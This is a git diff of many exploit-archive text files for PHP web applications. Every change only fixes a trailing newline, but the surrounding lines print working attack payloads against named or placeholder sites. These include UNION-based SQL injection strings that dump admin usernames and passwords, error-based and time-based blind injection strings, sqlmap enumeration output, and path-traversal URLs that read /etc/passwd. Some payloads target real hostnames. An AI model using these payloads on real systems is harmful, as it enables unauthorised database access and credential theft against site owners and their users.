a/platforms/php/webapps/4107.txt +++ b/platforms/php/webapps/4107.txt @@ -13,4 +13,4 @@ #PoC http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1 -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41075.txt b/platforms/php/webapps/41075.txt index ea7567073..2bb38b3ed 100755 --- a/platforms/php/webapps/41075.txt +++ b/platforms/php/webapps/41075.txt @@ -23,4 +23,4 @@ http://localhost/[PATH]/show_group_members.php?gid=[SQLi] ##### Vulnerable URL : http://localhost/[PATH]/home.php ##### Vuln. Parameter: first_name= -##### PAYLOAD : '"--> +##### PAYLOAD : '"--> \ No newline at end of file diff --git a/platforms/php/webapps/4108.txt b/platforms/php/webapps/4108.txt index 6fdd136a3..4cfc655e0 100755 --- a/platforms/php/webapps/4108.txt +++ b/platforms/php/webapps/4108.txt @@ -32,4 +32,4 @@ FROM GM: Kw3[R]ln Get over it! --==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41080.txt b/platforms/php/webapps/41080.txt index ff435cc52..4d6076a05 100755 --- a/platforms/php/webapps/41080.txt +++ b/platforms/php/webapps/41080.txt @@ -59,6 +59,4 @@ Vulnerable Parameters: brdId Method: POST Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM -INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH - - +INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH \ No newline at end of file diff --git a/platforms/php/webapps/41087.txt b/platforms/php/webapps/41087.txt index db86e7ced..1df9f1cb0 100755 --- a/platforms/php/webapps/41087.txt +++ b/platforms/php/webapps/41087.txt @@ -44,5 +44,4 @@ back-end DBMS: MySQL >= 5.0 [15:35:39] [INFO] retrieved: mysql [15:35:39] [INFO] retrieved: performance_schema [15:35:39] [INFO] retrieved: sys -[15:35:39] [INFO] retrieved: test - +[15:35:39] [INFO] retrieved: test \ No newline at end of file diff --git a/platforms/php/webapps/41093.txt b/platforms/php/webapps/41093.txt index 965c3f675..5cdbbc23e 100755 --- a/platforms/php/webapps/41093.txt +++ b/platforms/php/webapps/41093.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/news.dtl.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41099.txt b/platforms/php/webapps/41099.txt index 2912d0017..ffa4537a7 100755 --- a/platforms/php/webapps/41099.txt +++ b/platforms/php/webapps/41099.txt @@ -14,4 +14,4 @@ # http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL] # http://localhost/[PATH]/admin_giant/client.entry.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41101.txt b/platforms/php/webapps/41101.txt index 79cd6edd6..745b9a611 100755 --- a/platforms/php/webapps/41101.txt +++ b/platforms/php/webapps/41101.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/backoffice/video.php?act=edit_cat&video_id=[SQL] # http://localhost/[PATH]/backoffice/banner_list.php?act=edit_cat&banner_id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41105.txt b/platforms/php/webapps/41105.txt index accbeed78..8108cb243 100755 --- a/platforms/php/webapps/41105.txt +++ b/platforms/php/webapps/41105.txt @@ -18,4 +18,4 @@ # http://localhost/[PATH]/admin/addnew.activity.php?id=[SQL] # http://localhost/[PATH]/admin/addblog.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4111.txt b/platforms/php/webapps/4111.txt index 2f7a37082..3867e0dc2 100755 --- a/platforms/php/webapps/4111.txt +++ b/platforms/php/webapps/4111.txt @@ -20,4 +20,4 @@ http://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz # Greetz To: Tryag-Team & AsbMay's Group & Crackers_Child & Rf7awy & t0pP8uZz :D -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/41111.txt b/platforms/php/webapps/41111.txt index 91d752d30..e7d877ad5 100755 --- a/platforms/php/webapps/41111.txt +++ b/platforms/php/webapps/41111.txt @@ -14,4 +14,4 @@ # http://localhost/[PATH]/admin/member.regform.php?user_id=[SQL] # http://localhost/[PATH]/admin/subject_add.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41113.txt b/platforms/php/webapps/41113.txt index 178f6da37..2f75ba13f 100755 --- a/platforms/php/webapps/41113.txt +++ b/platforms/php/webapps/41113.txt @@ -64,4 +64,4 @@ Parameter: txtusername (POST) [16:59:17] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.23, PHP 5.6.24 -back-end DBMS: MySQL >= 5.0 +back-end DBMS: MySQL >= 5.0 \ No newline at end of file diff --git a/platforms/php/webapps/41116.txt b/platforms/php/webapps/41116.txt index fceee0571..897aecfcd 100755 --- a/platforms/php/webapps/41116.txt +++ b/platforms/php/webapps/41116.txt @@ -51,4 +51,4 @@ Parameter: token (GET) Title: Generic UNION query (NULL) - 6 columns Payload: token=-7417' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL-- -aNXq +aNXq \ No newline at end of file diff --git a/platforms/php/webapps/4112.txt b/platforms/php/webapps/4112.txt index bae496628..2c2260b8b 100755 --- a/platforms/php/webapps/4112.txt +++ b/platforms/php/webapps/4112.txt @@ -32,4 +32,4 @@ #, Bernard, and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/41127.txt b/platforms/php/webapps/41127.txt index a9f1a6e19..576b869ea 100755 --- a/platforms/php/webapps/41127.txt +++ b/platforms/php/webapps/41127.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4113.pl b/platforms/php/webapps/4113.pl index 318c2ffc2..3fb42f7ec 100755 --- a/platforms/php/webapps/4113.pl +++ b/platforms/php/webapps/4113.pl @@ -110,4 +110,4 @@ if ( 200 == $response->code ) { print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n"; } -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/41131.txt b/platforms/php/webapps/41131.txt index 93998dc28..04b6462cd 100755 --- a/platforms/php/webapps/41131.txt +++ b/platforms/php/webapps/41131.txt @@ -47,5 +47,4 @@ Parameter: cId (GET) [22:54:32] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.23, PHP 5.6.24 -back-end DBMS: MySQL >= 5.1 - +back-end DBMS: MySQL >= 5.1 \ No newline at end of file diff --git a/platforms/php/webapps/4114.txt b/platforms/php/webapps/4114.txt index 67040a5e1..59e51c8f5 100755 --- a/platforms/php/webapps/4114.txt +++ b/platforms/php/webapps/4114.txt @@ -44,4 +44,4 @@ GREETZ: str0ke, H4CKY0u.org, G0t-Root.net ! --==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/41140.txt b/platforms/php/webapps/41140.txt index 6d93ac1ac..8cb231e5b 100755 --- a/platforms/php/webapps/41140.txt +++ b/platforms/php/webapps/41140.txt @@ -21,5 +21,4 @@ SQL Injection http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version() -http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()-- - +http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()-- \ No newline at end of file diff --git a/platforms/php/webapps/41143.rb b/platforms/php/webapps/41143.rb index 24965c686..88064a87b 100755 --- a/platforms/php/webapps/41143.rb +++ b/platforms/php/webapps/41143.rb @@ -104,4 +104,4 @@ initial = resp.body 3. Solution: Update to version 1.0.11 -https://github.com/pagekit/pagekit/releases/tag/1.0.11 +https://github.com/pagekit/pagekit/releases/tag/1.0.11 \ No newline at end of file diff --git a/platforms/php/webapps/4115.txt b/platforms/php/webapps/4115.txt index a1ed562c1..2ea4992ea 100755 --- a/platforms/php/webapps/4115.txt +++ b/platforms/php/webapps/4115.txt @@ -16,4 +16,4 @@ #thanks:str0ke -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/41155.txt b/platforms/php/webapps/41155.txt index 382ebdb4f..b80172da3 100755 --- a/platforms/php/webapps/41155.txt +++ b/platforms/php/webapps/41155.txt @@ -53,4 +53,4 @@ Vulnerable Parameters: v Method: GET Payload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM -INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) \ No newline at end of file diff --git a/platforms/php/webapps/41159.txt b/platforms/php/webapps/41159.txt index 05dfc7b70..2dada9d29 100755 --- a/platforms/php/webapps/41159.txt +++ b/platforms/php/webapps/41159.txt @@ -131,4 +131,4 @@ is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/php/webapps/4116.txt b/platforms/php/webapps/4116.txt index d0f18025e..1c2211295 100755 --- a/platforms/php/webapps/4116.txt +++ b/platforms/php/webapps/4116.txt @@ -13,4 +13,4 @@ #thanks:str0ke -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/41177.txt b/platforms/php/webapps/41177.txt index f41fc5d61..a75e01043 100755 --- a/platforms/php/webapps/41177.txt +++ b/platforms/php/webapps/41177.txt @@ -27,4 +27,4 @@ Vulnerable parameter : imgid Mehod : GET Payload: -imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)-- +imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)-- \ No newline at end of file diff --git a/platforms/php/webapps/41178.txt b/platforms/php/webapps/41178.txt index db912c34a..325e6f771 100755 --- a/platforms/php/webapps/41178.txt +++ b/platforms/php/webapps/41178.txt @@ -23,4 +23,4 @@ http://locahost/weblog/blog/2[payload]/second-blog.html Mehod : GET Simple Payload: -blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html +blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html \ No newline at end of file diff --git a/platforms/php/webapps/41180.txt b/platforms/php/webapps/41180.txt index fdaef78ba..353c37320 100755 --- a/platforms/php/webapps/41180.txt +++ b/platforms/php/webapps/41180.txt @@ -33,4 +33,4 @@ http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wor 3 - Timeline: 12/01/2016 – Discovered - 13/12/2016 – Vendor not finded + 13/12/2016 – Vendor not finded \ No newline at end of file diff --git a/platforms/php/webapps/41181.txt b/platforms/php/webapps/41181.txt index 05c83975f..e2a1ef77b 100755 --- a/platforms/php/webapps/41181.txt +++ b/platforms/php/webapps/41181.txt @@ -15,5 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/roomtype-details.php?tid=[SQL] # E.t.c -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41182.txt b/platforms/php/webapps/41182.txt index 9a15a739a..40ee3d00b 100755 --- a/platforms/php/webapps/41182.txt +++ b/platforms/php/webapps/41182.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL] # E.t.c -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41184.txt b/platforms/php/webapps/41184.txt index 11de71dc4..63308aa65 100755 --- a/platforms/php/webapps/41184.txt +++ b/platforms/php/webapps/41184.txt @@ -129,4 +129,4 @@ CSRF Stop Web Service: - + \ No newline at end of file diff --git a/platforms/php/webapps/41186.txt b/platforms/php/webapps/41186.txt index d62a5b0d8..70949dc8f 100755 --- a/platforms/php/webapps/41186.txt +++ b/platforms/php/webapps/41186.txt @@ -20,4 +20,4 @@ Vulnerable Url: http://locahost/searchJob.php?sitterService=1[payload] Vulnerable parameter : sitterService -Mehod : GET +Mehod : GET \ No newline at end of file diff --git a/platforms/php/webapps/41187.txt b/platforms/php/webapps/41187.txt index d46b2a686..c95026dda 100755 --- a/platforms/php/webapps/41187.txt +++ b/platforms/php/webapps/41187.txt @@ -27,4 +27,4 @@ Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks Type: UNION query Title: Generic UNION query (NULL) - 1 column -Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee +Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee \ No newline at end of file diff --git a/platforms/php/webapps/41188.txt b/platforms/php/webapps/41188.txt index 94b5282e5..72cfd7bab 100755 --- a/platforms/php/webapps/41188.txt +++ b/platforms/php/webapps/41188.txt @@ -31,4 +31,4 @@ Parameter: #1* (URI) Type: UNION query Title: Generic UNION query (NULL) - 6 columns - Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA --- + Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA --- \ No newline at end of file diff --git a/platforms/php/webapps/41189.txt b/platforms/php/webapps/41189.txt index b1ee79b50..99c2362de 100755 --- a/platforms/php/webapps/41189.txt +++ b/platforms/php/webapps/41189.txt @@ -27,4 +27,4 @@ Parameter: scat (GET) Type: UNION query Title: Generic UNION query (NULL) - 26 columns - Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES + Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES \ No newline at end of file diff --git a/platforms/php/webapps/41190.txt b/platforms/php/webapps/41190.txt index c4d21cde2..f46558e1a 100755 --- a/platforms/php/webapps/41190.txt +++ b/platforms/php/webapps/41190.txt @@ -23,4 +23,4 @@ URL : http://localhost/see_more_details.php?id=40[payload] Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 29 columns -Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs +Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs \ No newline at end of file diff --git a/platforms/php/webapps/41191.txt b/platforms/php/webapps/41191.txt index 74f7c94d0..769330bfa 100755 --- a/platforms/php/webapps/41191.txt +++ b/platforms/php/webapps/41191.txt @@ -23,4 +23,4 @@ URL : http://localhost/category.php?sk=4[payload] Parameter: sk (GET) Type: UNION query Title: Generic UNION query (NULL) - 52 columns -Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL +Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL \ No newline at end of file diff --git a/platforms/php/webapps/41193.txt b/platforms/php/webapps/41193.txt index f4c1a2bbe..13e8ed220 100755 --- a/platforms/php/webapps/41193.txt +++ b/platforms/php/webapps/41193.txt @@ -32,4 +32,4 @@ Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL# ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/41194.txt b/platforms/php/webapps/41194.txt index 79e958c12..61cae541b 100755 --- a/platforms/php/webapps/41194.txt +++ b/platforms/php/webapps/41194.txt @@ -31,4 +31,4 @@ Parameter: inf (GET) Type: UNION query Title: Generic UNION query (NULL) - 14 columns - Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS + Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS \ No newline at end of file diff --git a/platforms/php/webapps/41195.txt b/platforms/php/webapps/41195.txt index c007ef93a..67fc68368 100755 --- a/platforms/php/webapps/41195.txt +++ b/platforms/php/webapps/41195.txt @@ -31,4 +31,4 @@ Parameter: property_for (GET) Type: UNION query Title: Generic UNION query (NULL) - 8 columns - Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo + Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo \ No newline at end of file diff --git a/platforms/php/webapps/41199.txt b/platforms/php/webapps/41199.txt index 5795626b6..1c45aae0a 100755 --- a/platforms/php/webapps/41199.txt +++ b/platforms/php/webapps/41199.txt @@ -35,4 +35,4 @@ Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (NULL) - 26 columns - Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# \ No newline at end of file diff --git a/platforms/php/webapps/41210.txt b/platforms/php/webapps/41210.txt index a24c7506a..bc7dfb185 100755 --- a/platforms/php/webapps/41210.txt +++ b/platforms/php/webapps/41210.txt @@ -21,4 +21,4 @@ Parameter : query Simple Payload: Type: UNION query -Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search= +Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search= \ No newline at end of file diff --git a/platforms/php/webapps/4122.txt b/platforms/php/webapps/4122.txt index 58b2e3219..a67255d83 100755 --- a/platforms/php/webapps/4122.txt +++ b/platforms/php/webapps/4122.txt @@ -29,4 +29,4 @@ http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3 # Sp.Thanx To : Tryag-Team & G0t-Root.Net -# milw0rm.com [2007-06-28] +# milw0rm.com [2007-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/41225.txt b/platforms/php/webapps/41225.txt index bce18a1bf..e07d39ac4 100755 --- a/platforms/php/webapps/41225.txt +++ b/platforms/php/webapps/41225.txt @@ -16,4 +16,4 @@ Parameter: propid (GET) Type: AND/OR time-based blind Simple Payload: -Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop +Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop \ No newline at end of file diff --git a/platforms/php/webapps/41235.txt b/platforms/php/webapps/41235.txt index a625c5548..eab60a7db 100755 --- a/platforms/php/webapps/41235.txt +++ b/platforms/php/webapps/41235.txt @@ -22,4 +22,4 @@ Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/41238.txt b/platforms/php/webapps/41238.txt index de830a301..af0553eb2 100755 --- a/platforms/php/webapps/41238.txt +++ b/platforms/php/webapps/41238.txt @@ -74,4 +74,4 @@ http://localhost/product_search.php?category_id=1&sub_category_id=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind - Payload: category_id=1&sub_category_id=1 AND SLEEP(5) + Payload: category_id=1&sub_category_id=1 AND SLEEP(5) \ No newline at end of file diff --git a/platforms/php/webapps/4124.txt b/platforms/php/webapps/4124.txt index 41d4aaf34..a01da6c05 100755 --- a/platforms/php/webapps/4124.txt +++ b/platforms/php/webapps/4124.txt @@ -10,4 +10,4 @@ http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00 -# milw0rm.com [2007-06-28] +# milw0rm.com [2007-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/41247.txt b/platforms/php/webapps/41247.txt index 0ff1d4698..bbafc4c9b 100755 --- a/platforms/php/webapps/41247.txt +++ b/platforms/php/webapps/41247.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?menu=forum_catview&catid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4125.txt b/platforms/php/webapps/4125.txt index 3e01e5981..9deca0749 100755 --- a/platforms/php/webapps/4125.txt +++ b/platforms/php/webapps/4125.txt @@ -35,4 +35,4 @@ SparrowRulez; st0ke; ====================================================== -# milw0rm.com [2007-06-28] +# milw0rm.com [2007-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/41250.txt b/platforms/php/webapps/41250.txt index e11a54de5..a5599d58a 100755 --- a/platforms/php/webapps/41250.txt +++ b/platforms/php/webapps/41250.txt @@ -63,4 +63,4 @@ http://localhost/search_result_alluser.php?compid="> + Payload: "> \ No newline at end of file diff --git a/platforms/php/webapps/41258.txt b/platforms/php/webapps/41258.txt index 2f45a7d1c..4ea97df15 100755 --- a/platforms/php/webapps/41258.txt +++ b/platforms/php/webapps/41258.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/post.php?id=[SQL] # Etc... # -9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin-- -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41260.txt b/platforms/php/webapps/41260.txt index cb19fc43a..dc7f5a682 100755 --- a/platforms/php/webapps/41260.txt +++ b/platforms/php/webapps/41260.txt @@ -18,4 +18,4 @@ # # http://localhost/[PATH]/video.php?id=[SQL] # 7-9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,5,6,7,8+from+admin-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41261.txt b/platforms/php/webapps/41261.txt index 2b9675c7a..1ac7240e9 100755 --- a/platforms/php/webapps/41261.txt +++ b/platforms/php/webapps/41261.txt @@ -29,4 +29,4 @@ Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: http://localhost/newsbee/30' OR SLEEP(5) AND 'VLvJ'='VLvJ_news_thai_soccer_targets_asia_wide_goals.html ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/41262.txt b/platforms/php/webapps/41262.txt index 561816eab..a66e5338d 100755 --- a/platforms/php/webapps/41262.txt +++ b/platforms/php/webapps/41262.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/site.php?id=[SQL] # -9999+/*!50000union*/+select+concat_ws(0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+administrator-- -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41268.txt b/platforms/php/webapps/41268.txt index 02bf520e5..5020b9fbe 100755 --- a/platforms/php/webapps/41268.txt +++ b/platforms/php/webapps/41268.txt @@ -20,4 +20,4 @@ # http://localhost/[PATH]/blog.php?stt=[SQL] # 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # Etc....Other files have vulnerabilities ... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4127.txt b/platforms/php/webapps/4127.txt index ad3aee349..1b06fe20e 100755 --- a/platforms/php/webapps/4127.txt +++ b/platforms/php/webapps/4127.txt @@ -28,4 +28,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps ! --==+ Buddy Zone Version 